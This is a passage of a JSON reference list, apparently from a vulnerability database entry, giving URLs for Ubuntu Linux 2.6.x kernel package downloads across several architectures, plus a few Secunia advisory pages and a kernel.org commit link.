      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.31-22-powerpc64-smp-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-28-powerpc64-smp-di_2.6.24-28.70_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-19-lpia-di_2.6.28-19.61_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-22-powerpc-di_2.6.31-22.60_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/jfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-19-generic-di_2.6.28-19.61_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.84_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-22-sparc64-di_2.6.31-22.60_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-28-generic-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-28-sparc64-smp_2.6.24-28.70_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-19-generic-di_2.6.28-19.61_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-powerpc-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-28-generic-di_2.6.24-28.70_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-sparc64-di_2.6.32-22.35_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fs-common-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.84_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-28-386-di_2.6.24-28.70_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.31-22-lpia-di_2.6.31-22.60_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/secunia_security_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://git.kernel.org/linus/ea30e11970a96cfe5e32c03a29332554573b4a10"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/business_solutions/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/35265/"
      },
      {
        "trust": 0.1,
        "url": "http://secunia.com/advisories/about_secunia_advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.36.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-server_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic-pae_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/squashfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc64-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-386_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-server_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-386_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.32_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.36.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.36_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.32-22-powerpc64-smp_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.32-22-powerpc_2.6.32-22.36_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/vlan-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22_2.6.32-22.36_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.36_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.36_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.36_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-pae-di_2.6.32-22.36_i386.udeb"
      },
      {
        "trust": 0.1,
